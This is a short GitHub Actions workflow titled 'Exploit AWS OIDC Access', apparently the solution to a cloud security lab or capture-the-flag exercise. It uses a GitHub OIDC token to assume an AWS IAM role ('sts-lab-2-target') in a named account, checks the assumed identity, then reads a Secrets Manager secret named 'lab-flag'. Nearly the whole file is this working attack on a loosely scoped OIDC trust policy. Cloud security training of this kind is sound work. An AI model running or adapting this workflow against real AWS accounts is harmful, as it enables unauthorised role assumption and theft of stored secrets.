name: "Exploit AWS OIDC Access"

on:
  workflow_dispatch:  # Allows manual execution

permissions:
  id-token: write
  contents: read

jobs:
  escalate:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-region: us-east-1
          role-to-assume: arn:aws:iam::713881802184:role/sts-lab-2-target
          role-session-name: OIDCSession

      - name: Verify Role Assumption
        run: aws sts get-caller-identity

      - name: Retrieve Secret (Flag)
        run: aws secretsmanager get-secret-value --secret-id lab-flag
